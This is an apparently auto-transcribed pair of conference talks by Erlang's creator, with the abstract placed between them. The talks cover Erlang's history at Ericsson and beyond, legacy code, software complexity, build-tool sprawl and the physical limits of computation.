So I met Bjarne Stroustrup and he said, oh, C++ was banned 11 times, he said. So I thought, we've only been banned once. So we were banned. Now that was really bad news, actually. Well, at the time it was really bad news. I couldn't sleep, I was getting ulcers, oh dear, what are we going to do? So, well, what happened after that was quite fun. After it was banned, there was about a four-month period where the computer science lab people sort of went into a little huddle and went, what should we do, what should we do, what should we do? Well, we can't fight the technical director, because he's a very big, powerful man. So, I know, we'll all quit, we said, and start a company. We want to use Erlang, right. So then Erlang, after four months, became open source, through a mechanism that still amazes me: we actually managed to persuade the Ericsson management, well, if we're not going to use it, release it as open source. And we managed to do that, amazingly. I still don't understand how. And four days after it was released as open source, we all left, by a strange coincidence. And, well, it was like a Dilbert cartoon: venture capitalists would just hand you money and stuff. Well, that was in the golden days of 1998. So four days later, we formed Bluetail. And the Erlang development split into two groups. Basically, the people who had been in the computer science lab all left and started a company. And the people inside Ericsson who had built the commercial product stuff went into flying-under-the-radar mode. They didn't really want to annoy anybody. And so they kept changing the name so nobody would notice it was Erlang. It was quite good. Now, seriously, if your project is banned, change the name, okay? No, I'm serious. Years later, I was working at Ericsson and my boss came in and said, this project you're doing, do you want the good news or the bad news?
What's the bad news? Well, the project you're working on has been cancelled. So what's the good news? We're starting a new project. Just change the name. It took them six months to catch on. Right. It's a very good method. Right. So it split into two. And so now I'm not actually in Ericsson anymore. I'm now outside Ericsson. And I haven't been watching carefully what's been going on. Haskell is now becoming pretty popular. Prolog has lost popularity totally. It's kind of sunk like a stone. It's niched into constraint logic programming. And interest in parallel machines has gone. There was a whole flurry of trying to make parallel architectures, gone. Because every single project that tried to make a parallel machine failed. And every single research project that tried to parallelise legacy code failed. Failed: they managed to get a 15% speed-up after massive efforts. I mean, people have been trying to parallelise code as long as Fortran has been around and they've never got more than 15%. And everybody's arguing about dynamic and static typing and lazy evaluation and eagerness. We're all having great arguments. This is 1998. Right. In this period now from 1998 to 2014, things are on the track to where we are today. Bluetail was formed in 1998. After two years, Bluetail was acquired for $154 million, which was kind of nice because we had formed it and owned stock in it. And it was quite fun. And a guy called Alexey Shchepin, I don't know if I'm pronouncing his name correctly, started building an XMPP server in Erlang, out in the Ukraine; this became ejabberd. Bluetail was acquired by Alteon WebSystems. Alteon WebSystems was acquired by Nortel Networks. Nortel Networks went bankrupt. Everybody got fired. And then out of the embers of these groups, three companies formed. Tail-f formed out of the embers of the collapse of Nortel Networks. Klarna was founded. These were founded in 2005, 2006. We'll learn more about those later.
In 2006, Alexey Shchepin was awarded Erlang User of the Year. 2007, I wrote a book on Erlang, because I hadn't written one for 14 years. Then the applications started coming out. Facebook chat was suddenly announced. Two guys at Facebook had written a chat server in Erlang. It was deployed and it was running the chat services inside Facebook. 2008: the book that I had written about Erlang stimulated the Haskell people. Bryan O'Sullivan wrote his, and suddenly O'Reilly said, why aren't we publishing books on functional programming? And I'd been saying for years, publish the stuff, get the books out so people can learn to do it. And the whole movement started building up then. 2009, WhatsApp was founded, actually quite interestingly, for a number of reasons. One was that they were looking at the Facebook chat server at the time, and that seemed to be good. It was the highest-performing XMPP server that you could make on the planet. The XMPP server had captured more than... okay, so a company called ProcessOne had taken it and was competing with a Java server. The Erlang server was not only faster than the Java server, I think it was about four times faster, but it was free. And the Java server cost money, so they had a product that was four times faster and free. So that swept the world. It had 60, 70% of the XMPP market. XMPP is this instant messaging protocol, an XML-based protocol; corporations tend to use it more, and there are open Java servers, for example, for XMPP. That server was the basis of the Facebook chat engine. And at that time, oh, and there were now one or two books: I'd written my book, and my good friend Francesco Cesarini and Simon Thompson had written theirs. Francesco was a master's student that I supervised at Ericsson, and he went on to form Erlang Solutions. He subsequently wrote Erlang Programming, or is it Programming Erlang, I can never remember which is which: the O'Reilly book.
And so the WhatsApp people said, whoa, okay, we're going to build this application, and they started building it in Erlang with 10 engineers in 2009. The same year as the Erlang books came out, and then a load more books came out. And then in 2014, of course, WhatsApp was acquired for $19 billion by Facebook, which is ironic really, because by then Facebook had dropped Facebook chat and re-implemented it in Java++ or something. And the reason for that was, they said, they couldn't get the Erlang stuff to fit into their infrastructure. So what they had built themselves with their own engineers, they then bought later for $19 billion from somebody else, to buy not only the technology but the user base, which I think is interesting to say the least. So there we go. So if you look back at this time scale, you'll see that when you're developing a technology, it seems to go in periods: there's a gap of about three to five years before you rush into some new area, we're going to use this new technology, you get all excited and you start a project, you start a company or something like that. And then nothing seems to happen, because you've got to do three to five years of work before there's a result. And then the results pop out three to five years downstream, and then there's a massive flurry of attention. So Erlang's gone like that. We keep on going, oh, nothing's happening, nobody's using it. And then suddenly you all start tweeting, hey, WhatsApp's been sold for the largest acquisition ever and it's all programmed in Erlang. Oh, that's cool. And then the Erlang user conference in San Francisco, it was quite funny, they had parallel sessions, but the WhatsApp guys were talking about how they built the WhatsApp application in Erlang, and there were some parallel sessions. But not many people went to the parallel sessions.
In fact, no people at all went to the parallel sessions, and I think they'd scheduled it in the smallest room or something. There was a great room change at the last moment. Anyway, how it spread has actually been rather like the spread of printing after Gutenberg made the first printing press. There was a 14-year cycle. It took seven years to be an apprentice, and once you'd been an apprentice for seven years, you had to work for your master, or whatever it was called, for a seven-year period, and then you could go and start your own company. So about every 14 years, there was a doubling. What we've seen in the Erlang development is that the sort of Erlang DNA started in the computer science lab. It stayed there for quite a long time. Then it split into Bluetail, this is outside Ericsson by the way. Bluetail lasted three or four years. Then it split into Tail-f and Klarna; this is the genetic material spreading. Klarna is an online banking place in Sweden, the hottest IT banking startup in Sweden; it now employs, I don't know, lots and lots of people. It was expanding. The front end is all written in Erlang, the back end in Java and things like that. Tail-f do NETCONF stuff and sell into Cisco and places like that. Then Erlang Solutions sort of split off and does consulting. They're cross-owned with Basho, which has done the Riak database, and Trifork. Riak has found itself all over the place. And there are other things outside that consortium. There are quite a few databases written in Erlang; CouchDB, for example. CouchDB is written in Erlang and was chosen by CERN for the Large Hadron Collider experiments and helped discover the Higgs boson. Erlang helped discover the Higgs boson, which is quite nice, because I'm an ex-physicist. Where have we got to? Oh, yes, technical.
In the same period as these companies and things were going on, I think we've come back full circle now to looking at parallelism again. Because the thing that Erlang is pretty well suited for, which gave it a boost in 2004, 2005, was how to handle concurrency, because the multi-core computers came along. In 2007, Intel made, Polaris I think it was called, I can't remember the name, an 80-core network-on-chip architecture which did 1.1 teraflops at 62 watts. That's totally amazing performance. In 2007, Tilera came out with the TILE64, and I managed to get hold of one of the first production batches of those things, and we took it into the lab and ported Erlang to it. We had a telephony application, and we ported it to the TILE64 without doing anything to it. It ran 33 times faster. Just the first time. We didn't do anything to the code at all, and we were very pleased about that. We showed it to the management and they said, why doesn't it go 64 times faster? We said, we don't know. They wanted it to go 64 times faster. I'm looking at Adapteva, which has made this parallel board. I think these network-on-chip architectures are really... in 2015 we'll probably see 1,024 cores commercially available running at about 15 watts. These are supercomputers on a single chip, and I think the key to the future is actually low energy. The people making the chips say these are high-performance chips, but nobody can think of applications that need that performance, unless we do simulation, unless we do whole-brain simulations and things like that that need massive computing power. There are very few problems that need that amount of computing power. On the other hand, we do need low-energy computation, and low-energy computation can be achieved by massive parallelization and by dropping clock frequencies.
There's a new generation of processors which are highly parallel with very low clock frequencies and which have different, funny cache behaviours, and learning to program those is essential for building low-energy applications. I think that's very interesting. The Erlang programming model actually fits into that quite nicely, because caching is extremely important there. All Erlang processes just have their own little stack and heap. Having written your program with processes, you've already ensured that those processes are isolated; they can't look at anybody else's memory or anything like that. So I think it's well placed for that. Just a few observations. The predictions that people were making in 1985 were almost completely wrong. The predictions as to which languages would be used in the future turned out to be completely wrong. Predictions about the use of legacy code turned out to be completely wrong. I remember quite clearly, when I worked for Ericsson, talking to the head of strategy, and he said, in the future everybody will be programming Plex, because that was the language that we programmed in. I said, no, we won't. He said, yes, we will. It's company strategy. New products will be programmed in Plex, as we have always promised our customers backwards compatibility with Plex. I said, no, it won't happen. In 20 years' time, not a single line of Plex will be written. I was right. We don't write any Plex at all. Zero, zilch, zero. The only Plex we've got, we've bunged into virtual machines. We don't dare change a single line of code, because we will introduce 2.5 errors for every line of code we change. We put them in a virtual machine and nobody knows what they do. Hopefully one day we will chuck them away in the bin because it's rubbish. Well, it's not rubbish; it works, but nobody knows why it works. That's my lecture tomorrow. The people who wrote the stuff are dead and there's no spec. Right. It's tricky.
The most significant events that led to Erlang escaping were totally unplanned and were non-technical in nature. They were things like being banned. They were things like projects failing, and rushing in when they fail. All these good arguments just never worked, ever. You know this engineering stuff? What's the problem? List the ten best solutions, take three of them, study them and build prototypes, and then go to the management with the results of the best prototype, and they'll go and do that. That doesn't work at all. Wait for a crisis and run in quickly. That's what you should do. Look for projects that are going to fail. That's a good tip. When all else fails, when they're drowning, when they're shouting save me, they rush in. That's the time to do it. Some predictions of future technology were correct. I remember some old bloke saying, go parallel, young man. The future is parallel. We said that in about the mid-80s, and it's completely correct. That's where the future is, parallel computing. We're going into this transition period of trying to learn how to program parallel computers. And in this transition, I noticed a couple of days ago Apple released this Swift parallel functional programming language. It's like, oh, it's great, Apple has joined this functional programming bandwagon. Yeah, they have. Instead of climbing on board with the Haskell people and making a Cocoa bridge, which would be good, they make their own one, and they will gain market share due to that. In 15 years' time, we'll be cursing them, because they'll have all this legacy code that nobody knows how it works, and will have changed language yet again. Can't they just join forces, please? Join the Haskell people, or join the Erlang people, join the ML people. Don't make your own mistakes. Benefit from the previous mistakes that we've made. Yeah, these large legacy systems we built have totally collapsed and are not used.
I'll talk about this tomorrow, but management has this weird view of fixing up legacy code: well, we've got all these millions of lines of code, and you want to rewrite it all? Yes. It's going to be quicker. No. Yes. But they don't do it. So the new startups don't take the legacy code. They just build from scratch in the best technology of the day. Some of those are going to win. Darwin-type survival of the fittest will happen. Software hit complexity boundaries years ago and is in a complete mess. Functional programming offers some slight improvement on that. It's not proof; it's fewer things you can shoot yourself with. Strong type systems, things like that, provide you with fewer ways to blow your foot off by mistake. In tomorrow's lecture, I'll keep saying: six 32-bit integers in C have more possible states than the number of atoms on the planet. This machine, this has a 250-gigabyte solid-state disk. The number of states this machine can be in is two to the power of 250 giga. That is more than the total number of states in the universe. So when I've got a problem on my computer, and somebody says, well, I had the same problem, I tried this and it worked, and then it doesn't work for me, that's because our machines are in different states to start with. We need mathematics, we need strong tools to prove systems correct, and we don't know how to do that. We need to compose systems from small bits that we've tried to prove correct, and we need to glue them together, and we don't know how to do this. My generation of programmers, in the last 30 years, has created trillions of man-hours of mess that you guys are going to have to clean up, and I'll talk about that tomorrow. So I think that's about what I wanted to say. So thank you very much. Questions? What? Oh, sorry, yes. The question was, strings are just lists of characters. Why? Well, because that's the correct way to do it.
No, I mean, in Erlang a string is just a list of integers, where the integers are code points, and they can be Unicode code points or Latin-1 code points or whatever you want. But there's no notion of a UTF-8 string or any particular encoding there. Syntactic strings don't exist, basically; they're just syntactic sugar for these things with quotes around them. You see, it's just an internal representation of this literal that's got quotes around it. That's what you call a string. They don't actually exist. They're not like integers. Yes? Well, I had... oh, well, I had Lisp on my list. Oh, well, that list of functional languages, that was the evolution of Haskell, so Lisp didn't play any role in the evolution of Haskell. But, yeah, okay, yes. Sure. No, no, no, no. Well, that thing I showed was an excerpt from David Turner's paper, and it's what he wrote in his paper, and he didn't include Lisp in that chain of history, as it were. Right. More questions? No. Okay. Thank you very much.
This talk outlines developments in programming from the beginning of programming (in 1948) to today. In particular I'll talk about the development of Erlang and about the trends in programming that lead to Erlang and what these trends mean for the future. Work on Erlang started in 1985, so we'll turn the clock back to 1985 and see what the world looked like then. C++, Java, Haskell, Javascript, Ruby, Python and Perl had yet to be invented. Most people believed, incorrectly as it turned out, that Ada and PL/1 would dominate the future. But I was more interested in Prolog and Smalltalk. Prolog was the answer, but I didn't know what the question was. I'll talk about how we grew a programming language, and what the main factors were in spreading the language. I'll relate my personal experience with Erlang to broader developments in programming and try to see how the two fit together. I'll also take a peep into the future and speculate about where computing is going.
10.5446/50608 (DOI)
No hands up. Yeah, about two and a half years before I was born, the first computer ran at Manchester University. It had, I think, 18 instructions, and it made use of the Williams tube, which could store 1,024 bits on a cathode ray tube for up to an hour. And that was the first program that ever ran on a stored-program computer. It was in 1948. Of course, I didn't really know about that when I was born. I discovered computing when I was a bit older, about 16 or 17 and at school. And I wanted to learn programming. So we could choose between Fortran, Assembler, or COBOL. But Assembler and COBOL weren't options, because nobody knew how to program in them. So I had the choice of only Fortran, and a turnaround time of three weeks once you'd written a program. Now the situation's a bit better. Well, perhaps it's a bit better. So you guys, when you're starting out, instead of having a choice between three different languages, have a choice between 2,500 different languages. So there's much more to choose from. On the other hand, it's not easy to make that choice, because there are so many bloody languages you don't know which language to choose. So I think actually we've got into a slight mess, and... there went my slides. Hello. What happened to the slides? Is this me or you? Oh, no. There we go. They're back again. Isn't it marvelous? Right. Was that the second slide? That was the second slide. Yes. I started programming when I was about 17, and I've always been kind of interested... Whoops. That's the third slide. Why are they moving forward automatically? I didn't... hey, stop it. Go away. Look. Right. Now don't do this to me. What? There's a little... which is that one? That one there. Right. So now it'll step forward. And if I double click outside, it will do that. Very good. Now it's not going to move forward. Is that right? Keep our fingers crossed. Right. So I'm going to talk about three things in this lecture. I think we're in a bit of a mess, actually.
So I'm going to go into why we're in a mess, and tell you what the symptoms of the mess are and the causes of the mess. That's about the first third of the lecture. Then, I used to be a physicist, actually, so for about a third of the lecture I'm going to talk about the physical limits of computation and what that means for computer programs and so on. And then, since we're in this mess, and I've contributed to making this mess, I've got some vague ideas about how we might conceivably get out of the mess. So I'll talk about that as well. So the start point for this: I'm going to go back to about 1985, because that's when I was, how old was I in 85? I mean, I was a young 35-year-old with a gleam in my eye, and I thought, I'll invent a new programming language which the whole world will use. And to help me, I had these wonderful things here. So this is a computer from 1985. By comparison with it, a laptop from a couple of years ago is a supercomputer. This little fella had 256 kilobytes of RAM. You could stick cards in it, so you could get an amazing three megabytes of memory if you filled it full of cards. Isn't that a lot? You get eight gigabytes on a stick now. It had this blindingly fast eight-megahertz clock. And it had a 20-megabyte disk, or if you had a lot of money, you could buy a 40-megabyte disk. So it wasn't really very good for downloading movies, because digital movies hadn't been invented. They were like 800 megabytes anyway, so they wouldn't fit. What's missing from that list? That's the spec of 1985. What's conspicuous by its absence? What? A mouse? No, communications. This thing couldn't talk to the internet at 100 megabits per second. It had no communications. That's a big thing that's changed. Now if you buy a computer, it's got a 100-megabit Ethernet connector or something. It's got Wi-Fi. You've got LTE and 4G and 3G and stuff. And you can connect to the internet at hundreds of megabits per second. You couldn't do that then.
Distributed computing is only something that's emerged from about 1990 onwards. We're only 10, 15 years into this period of distributed computing, and it's radically changed what's going on. So that was the start point. And now we've got these supercomputers. So this guy, let me see. Well, it's got 8 gigabytes of memory, a typical laptop today, this little thing. 8 gigabytes of memory: that's 32,000 times the memory of the machine in 1985. Maybe a new laptop's a quad core running at 2.5 gigahertz, so it's 1,000 times faster. And it's got 250 gigabytes of solid-state disk or something like that, so that's maybe 1,000 times faster too. So the machine that booted in 120 seconds in 1985 should boot in 120 milliseconds today. Does it? Does your machine boot in 120 milliseconds? No, it doesn't. So what the hell went wrong? What have we done as an industry? What have we got wrong? So I'm going to look at some of the things we did that were wrong. Right, so in the last 40 years, we've written a ton of code, millions of lines of code. But we have created an industry that will take trillions of man-hours to fix it. So you guys are going to say I should retire and die, and you can live on and fix all this complete mess we've made. So welcome to programming. Now I'm going to look at some of the things they said about programming languages when I started and compare them to what we say today. And we'll see exactly the same thing. In 1985: we're all going to program in PL/1 and Ada. That's the future. Just forget about anything else. How many people program in PL/1 here? Right. Ada? Oh, sorry. Well done. So you're believing this 1985 stuff and you're not going to change, right? So I take this with a pinch of salt. We're all going to be programming in C-minus-plus-minus-tran for the next million years. It's a load of rubbish. Well, when the hardware doesn't change, the programming languages don't change.
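The 1985-versus-today ratios quoted above can be checked directly; a small sketch in Python, using the figures as given in the talk:

```python
# Memory: 256 KB in 1985 versus 8 GB in a recent laptop.
mem_1985 = 256 * 2**10
mem_now = 8 * 2**30
mem_ratio = mem_now // mem_1985      # 32768 — the "32,000 times" figure

# Speed: "maybe 1,000 times faster", so a 120-second boot
# should now take 0.12 seconds.
boot_1985_s = 120
speed_ratio = 1000
expected_boot_s = boot_1985_s / speed_ratio
```

The point of the arithmetic is the gap: the hardware ratios are three to five orders of magnitude, yet boot times barely moved.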
So if the hardware is basically the same, the programming language will follow some S-curve, where you find a maximum, a most efficient way of programming that hardware. And then when the hardware changes, you'll suddenly start changing the programming models. So in fact, we've seen two changes in architectures in the last 15 years or so. The first thing is ubiquitous computing: the internet, and being permanently connected to the internet at high bandwidth. That started in about 1990. By 2000, it's a fact. The significant factor there is this permanent connection wherever you go. It's in your pocket, through LTE or something like that. And that means you need to know about distributed programming if you want to build interesting applications. All the interesting applications are distributed. The second thing that's happened is the multi-core thing that happened in 2004. That was inevitable. It was predicted around about 1998 or something like that. Chips got bigger and bigger and bigger, and the clock speed got faster and faster and faster. But then a physical limitation hit: you couldn't get a signal from one side of the chip to the other within a clock cycle, because the speed of light is finite, not infinite. And so the synchronous chip design vanished, and you put multiple cores on with their own clocks. That's because of the speed of light. You could also drop the voltage, so you can run at lower power because of that. So in the future, we're going to see... I mean, I'm experimenting with a 64-core low-power processor at the moment. We should see 1,024-core low-power processors coming onto the market in 2015. And they're going to influence how we do things. So we've got a change in the hardware, and that will be reflected in a change in the programming languages. No programming languages have been explicitly designed with distribution, multi-core, and low power in mind. I haven't seen any languages that have been designed with that in mind.
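The speed-of-light limit behind the move to multi-core is easy to quantify; a rough sketch, assuming a 3 GHz clock (my figure, chosen for round numbers):

```python
c = 3.0e8            # speed of light in vacuum, metres per second
clock_hz = 3.0e9     # an assumed modern clock frequency

# Distance light covers in one clock cycle: about 10 centimetres.
# Real on-chip signals propagate much slower than light, so a single
# synchronous clock can't span a large die — hence multiple cores,
# each with its own clock domain.
reach_m = c / clock_hz
```

Push the clock higher and the reachable region per cycle shrinks proportionally, which is why clock speeds flattened out around 2004 while core counts started climbing.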
We're working on it, so we'll see what happens. Right. And when those change, the languages will change. Right. So, what are the problems? What do the laws of physics have to say about computation? Can we get out of this mess we've got ourselves into? Right. So what are the problems? Here's a few: legacy code, complexity, all this kind of stuff. I'm going to talk about each of those in turn. So, legacy code. This is great. Legacy code is when all the programmers who wrote the stuff are dead. Right, that's legacy code. And it's a pain in the ass. There's no spec. Have you ever seen a program that had a specification? Well, I've seen a lot of programs, and I've seen a lot of specifications, and the two normally don't have anything to do with each other. They're kind of a vague description of what the program might do on a good day. They're written in archaic languages which nobody understands. Right, that's great. You want to be a maintenance programmer? Here's half a million lines of COBOL. Wow. Cool. That's just what I wanted to do. You've got to change one line of it, but which line? That's the problem. Nobody understands how this stuff works. And it works. And then we've got business value. We've got managers who say, well, this legacy code, this million lines of stuff written in COBOL and Fortran IV, has got commercial value, it's got business value, so we can't touch it. And to rewrite it, because the first time it was written it took a million man-hours or something, to rewrite it is going to take 10 million man-hours. Of course, nobody knows what it does, so it might not work. So management thinks that modifying legacy code is cheaper than a total rewrite. They are nuts. They're complete lunatics. Well, sometimes it is, if that legacy code is in good order, but often it's not. Right. So what do you do with legacy code? Don't touch it. Put it in a virtual... this is what you do.
You put the legacy code in a virtual machine. Don't mess with it. So you've got all these little black boxes running legacy code which nobody knows what it does, and it's just sitting there festering like a nasty wart or something that will come and hit you one day. Horrible stuff. But it's created a lot of job opportunities, so it's pretty good. Complexity. Complexity. Right. So I have to remind myself of some numbers; you'll see a lot of numbers in this talk. The mass of the Earth, I used to be a physicist, the mass of the Earth is six times 10 to the 27 grams, and the Earth's got about 10 to the 50 atoms in it. Just remember that number: 10 to the 50 is a nice number. So we do a back-of-envelope calculation. Here's my envelope. And on the back of the envelope: 10 to the 50 is about 2 to the 167, and if we divide 167 by 32 and take the ceiling of that, that's six. What does that say? Six 32-bit integers, what's that, 192 bits. But the number of atoms on the planet is 2 to the 167. So what does that say? That says a C program with six integers has more possible states than the number of atoms on the planet. And don't ask about JavaScript. What about JavaScript? Well, three variables, actually, because they're double precision. So what does that mean? Well, it means you need more than six unit tests if you've got six variables, or more than three unit tests if you've got three JavaScript variables. Just as an aside, my little machine here has got a 250-gigabyte solid-state disk in it. That means the number of possible states it can be in is 2 to the power of 250 billion times 8. OK? The total number of atoms, not in the planet, but in the universe, the total number of atoms in the universe, is about 2 to the 260. That means the number of states my machine can be in, divided by the number of atoms in the universe, is 2 to the 7 billion. So I'd need 2 to the 7 billion universes filled with computers.
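The back-of-the-envelope calculation above can be reproduced exactly; a quick Python check of the figures in the talk:

```python
import math

atoms_on_earth = 10**50

# 10**50 needs about 167 bits, i.e. six 32-bit integers.
bits_needed = math.ceil(math.log2(atoms_on_earth))   # 167
ints_needed = math.ceil(bits_needed / 32)            # 6

# Six 32-bit integers span 2**192 states — more states than
# there are atoms on the planet.
states = 2 ** (ints_needed * 32)
```

The same arithmetic gives the JavaScript version of the joke: three 64-bit doubles are also 192 bits, so three variables already exceed the atom count.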
And I might just find one that's in the same state as my computer. Right. So this is why, you know, I do things on my computer and it doesn't work. So I Google. I say, blah, blah, blah didn't work. And I find a web page where somebody says, oh, I had exactly the same problem as you, do this. And there's lots of mails after it. I say, oh, gee, thanks, that's absolutely great, because I had exactly the same problem. And I type this stuff in. And guess what? It doesn't work. Shit. So I Google again, and I find somebody else who had exactly the same problem. And I do it, and it doesn't work. Why is that? Well, because his machine, when he did these commands, or she did these commands, is not the same as my machine. Its state is different. In fact, the chance that it's the same is one in 2 to the 250 billion times 8. Right. And I would need to be very lucky, one in these 2 to the 7 giga universes, for the guy to have just happened to post when his machine was in the same state as mine. Well, it's not going to happen. And it happened to us surprisingly quickly. Last week, no, the week before last, at work, my colleague and I both got brand new Apple Retina laptop thingamajigs. And they were factory new. And they were installed. And we were going to run the same software. So we thought, we'll do the install together so that our machines are in sync. And after four hours, I typed some commands on my machine and an install worked, and he typed the same commands on his machine and the install failed. Right. And up to that point, we'd been the same. And then what do we do? Well, he started googling: oh, how the hell, I did it, it didn't work, trying this, doing that. So they diverged after four hours. Of course, they weren't the same to start with. But you kind of think they're the same, don't you? It's not true. It's not true. So what's the answer to all of this? Well, scary math to the rescue.
The trouble is, scary math hasn't got there yet. We don't have scary math to help us yet, OK? Because scary math is trying to prove things about the states of these programs, and the only way it can do it is to prune the search space down to something that's manageable and then look at that. So you can't really prove things about programs with more than two or three variables in. So that's pretty tricky. Well, sometimes, if they're specially constructed, you can. So we can't really look to scary math to help us yet. It's coming along. It takes a long time. It takes like 100 years for somebody to get a good idea, and then it takes... I mean, look at the lambda calculus. Church invented the lambda calculus in about 1930, the typed lambda calculus in 1936. And I think it got into Java this year, didn't it? Or last year or something. I mean, it takes rather a long time. And then nobody's had any ideas since Church. So there you go. Failures. What about failures? Well, stuff fails. Deal with it. Stuff does actually fail. Computers fail. So there's only one way to handle failures: do it on another computer. Joe's first theorem: in order to handle failures, you need two computers. Because if the whole computer crashes, you're screwed. Sorry, at least two. If you want to tolerate the failure of 100 computers, you need 101. The probability of them all failing at the same time is one in 2 to the power of 101, so it's low. But they still might all fail. That means that you need to understand distributed computing, because you've got two computers. You need to understand parallel computing, because they're running at the same time. And you need to understand concurrent programming, because the programs in them are running at the same time. So if you think you can do error handling or scalability without understanding these three things, it's not going to work. Now, I'm not going to talk about that. I've written three books about that and made a programming language to embody some of those ideas.
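The 101-machine claim above can be made concrete under a toy model; a sketch assuming each machine is independently down with probability 1/2 (my assumption — the talk doesn't fix a per-machine figure, and the "one in 2 to the 101" only comes out under this coin-flip model):

```python
machines = 101
p_down = 0.5   # assumed independent per-machine failure probability

# Probability that all 101 machines are down at once:
# (1/2)**101, i.e. one in 2**101 — vanishingly small, but not zero.
p_all_down = p_down ** machines
```

With any realistic per-machine availability the number is far smaller still; the point is only that redundancy shrinks the all-fail probability exponentially, it never reaches zero.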
And if you want to read more about that, you can read some of those. Right. It means, because systems break, and because they're becoming more complicated, we have to make them so that they will self-configure and they will repair themselves and they will evolve with time. I think they'll be like us: they'll gradually die. And it's a very interesting problem, handling dying chips. I'm looking at that: multicores where the cores start failing. When we produce 1,000-core multicore chips, half a dozen of the cores won't work. And then as we run them, some of the cores will start failing. And we need to live with that. We don't want to throw them away because bits of them don't work. Languages. Language doesn't matter, they say. Well, they should have told the Romans. Do you do arithmetic like this? No. It's even worse. You see, the Romans didn't have a zero. And they didn't have negative numbers. Do you know how old negative numbers are? They're not very old. They were about, I can't remember the date, 1,700 and something. We need notations and things that are familiar and easy to work with. And if you're in this mindset of programming with numerals like this and somebody else is using Arabic numerals, you won't understand each other. You say, well, it's a lot easier using Arabic. No, no, no, no. I'm perfectly happy with this. I mean, I'm not talking about Java and Haskell and things like that, I'm talking about Romans and things, but there are analogies to be made there. So, 1985: everybody, and there's a little star there, not absolutely everybody, everybody knew the Bourne shell, make, and C, if they were sort of scientific, technical programmer types. That meant they could talk to each other. Programmers could talk to each other. Well, now we can't talk to each other. We don't have these common languages. When you go to these big conferences, there's these .NET people. Any .NET people here? Right. Any JVM people here? Right.
Oh, golly. I've been to other conferences. I say, any JVM people? Oh, the hands go up. And you say, any .NET people here? Nobody. And I'm neither a .NET nor a JVM person, so I don't really belong here. I hope you won't eat me. It's like being thrown to the lions. At one conference, 99% of the audience were .NET people. Oh, my god. What's .NET? You think I'm joking? I haven't actually got a Windows machine. None of my friends have got a Windows machine. I don't know what it is. Well, I used one once. But that was a Windows audience. Yeah. And so now what do we program for the JVM and .NET? We program in Ruby and whatever else. We can't talk to each other. Right. So we can't send programs to each other. We can't understand them. So when I learned to program, I said this earlier, I could choose between three languages. Now, the first list I looked at, on Wikipedia, said there were 776 languages. I looked somewhere else: 2,500. There's a lot, anyway. And then we have build tools. Well, once upon a time, as I said, everybody talked make. Make's wonderful. I love make. And now there's Ant and Grunt and make and Rake and Maven and Jake and Bacon and BitBake and Fabric and Paver and Shovel and BitGrovel and God knows what, and who the hell knows what these things are. So, researching this talk, I looked on Stack Overflow, and somebody had asked the question, is there a Rake equivalent in Python? Yeah, well, there's Paver, Invoke, Shovel, WAF, and... well, that's really good. That's what I like. So a couple of months ago, I was writing this... I actually do some programming for my living at Ericsson. I was writing this program in Erlang, and it was going to go into a product. I wanted to put it on the target. And so the guy says, well, we've got this script that does it. Just log in on this development system and type make, because it was a make file, actually. Well, it invoked a bake file... no, a BitBake file, a BitBake recipe.
And it was taking a while. I left it, and I went, oh, oh, oh. 18 hours later, it had downloaded 46,000 files, which included the entire source code of the Linux kernel and of GCC, compiled the whole bloody lot up, and then built a single image, and then it cryptographically signed it and done all this stuff. And then I could take my three-module program and put it on the target. Well, of course, Erlang was designed to be object-code compatible, so you can just move the files over anyway. No, that's not possible. We have to use the build tool. I know you'll say you should have used Grunt, and it would have been easy, but I don't know how to build Grunt files. I'm sorry. This is not good, actually. Right. So without Google and Stack Overflow, programming would be impossible. I showed these slides to somebody two days ago, and he said, well, when the internet stops, I can't program. And I don't think "oh, shit, it doesn't work, oh, Google it" is a very good programming paradigm. In fact, I think programming is going to stop. You see, if I reckon up the amount of time I spend fixing stuff that's broken that shouldn't be broken, compared to doing real work where I'm just doing stuff, the fixing stuff that's broken that shouldn't be broken takes 30% to 40% of my time, and that is increasing with time. So I think in 10 years' time, nobody will be able to program. Everything you use will be broken in 10 years' time, and you won't be able to program. You'll spend all your life in Google searching for: why didn't my fucking program work? Because I've done this, and it's supposed to work, and it doesn't. Right, good. So, efficiency. And I love efficiency. You know, programming language designers, they don't care about efficiency. All the people who ever invented programming languages, like Dennis Ritchie and everybody: don't think about efficiency, think about correctness. Why is that?
Because programming language designers get blamed. If a programmer writes a program and it crashes and kills somebody, you see, it's the designer's fault, not the programmer's: you shouldn't have put that in your bloody language, right? So I'm more concerned about correctness than efficiency. So we have this sort of dichotomy between efficiency and clarity. To make something clearer, you add a layer of abstraction. To make something more efficient, you remove a layer of abstraction. So you're always kind of dancing around between these two alternatives. And of course, in the last 30 years, we have systematically chosen efficiency over clarity. Well, that's great. That's fantastic, because now we have machines that are so frigging fast you can throw anything at them and they do it instantaneously, if the code is correct. Right. So about 20 years ago, I was telling my bosses at Ericsson, I was saying, look, this is stupid. What we have to do is write our software as clearly as possible, as a few lines of code with as close a correspondence as we can make it to the specification and to the mathematics. And then we'll be in a very good position in the future, because as processors get faster, we'll just be able to take this stuff, and one day it will be fast enough. Right. So it's really simple. If you've got a program and you want to optimize it, make it 1,000 times faster, just wait 10 years. It's really simple. Erlang goes a million times faster by waiting 20 years. You just wait 10 years, it goes 1,000 times faster. Who's in such a bloody hurry? Why do we want it to be quick tomorrow? We're making this legacy code now that, if we don't fry the planet, and if we don't have a nuclear war, and if we don't have a pandemic, and if the nanorobots don't take over, and if we're not hit by an asteroid, and if there's not a supervolcano, is going to last for a bloody long time. And people will look back at this archaeological layer of crap that was done in the beginning of computing.
And they'll say, why did they write it like that? Why didn't they just write it efficiently? Sorry, no, clearly. Hey? So, what we see in the beginning of a technology is companies competing by being deliberately incompatible with each other. In the early browser wars, the Microsoft browser was deliberately incompatible with the Netscape browser. After 10 years of that, people say, hey, that's bloody stupid. Let's not compete over browsers; let's try and make them compatible with each other. So now the browsers largely all use WebKit or something like that, so they are compatible, and the wars are somewhere else. So we've got some decent functional programming languages. We've got Haskell, Erlang, things like that. And then Microsoft says: oh, there's some really good ideas in functional programming. I know what we'll do. We won't use them. We'll invent our own language, F#. That's nice. That's great. And then Apple comes along: oh, there's some really good ideas in functional programming. I know what we'll do. Let's not use them. Let's invent our own one. Why is that? Why is Microsoft making F#? Why is Apple making Swift? To lock you in forever, so that we can't talk to each other. Now that will last for 10 to 15 years, and then everybody will say, oh, this is a complete mess, because we've got all this legacy code which can't talk to each other. We've got the .NET world, we've got the JVM world, and you guys can't talk to each other. And it becomes part of that legacy code which has to be maintained for thousands of years into the future. It's not a good idea. 